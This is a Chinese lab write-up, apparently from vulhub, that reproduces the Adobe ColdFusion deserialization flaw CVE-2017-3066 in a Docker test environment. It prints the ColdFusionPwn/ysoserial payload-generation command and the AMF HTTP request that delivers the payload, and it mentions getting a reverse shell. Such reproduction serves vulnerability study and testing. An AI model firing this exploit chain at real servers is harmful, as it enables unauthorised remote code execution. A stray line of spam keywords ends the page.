<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)

    Path coldfusion/CVE-2017-3066

    Adobe ColdFusion是美國Adobe公司的一款動態Web服務器產品,其運行的CFML(ColdFusion Markup Language)是針對Web應用的一種程序設計語言。

    Adobe ColdFusion中存在java反序列化漏洞。攻擊者可利用該漏洞在受影響應用程序的上下文中執行任意代碼或造成拒絕服務。以下版本受到影響:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。

    參考鏈接:

    漏洞環境

    啟動漏洞環境:

    docker-compose up -d

    等待數分鐘時間,環境啟動成功,訪問http://your-ip:8500/CFIDE/administrator/index.cfm,輸入密碼vulhub,即可成功安裝Adobe ColdFusion。

    漏洞復現

    我們使用參考鏈接中的ColdFusionPwn工具來生成POC:

    java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser

    POC生成于poc.ser文件中,將POC作為數據包body發送給http://your-ip:8500/flex2gateway/amf,Content-Type為application/x-amf:

    POST /flex2gateway/amf HTTP/1.1
    Host: your-ip:8500
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-amf
    Content-Length: 2853
    
    [...poc...]

    進入容器中,發現/tmp/success已成功創建:

    將POC改成反彈命令,成功拿到shell:

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    討論數量: 0
    只看當前版本


    暫無話題~
    亚洲 欧美 自拍 唯美 另类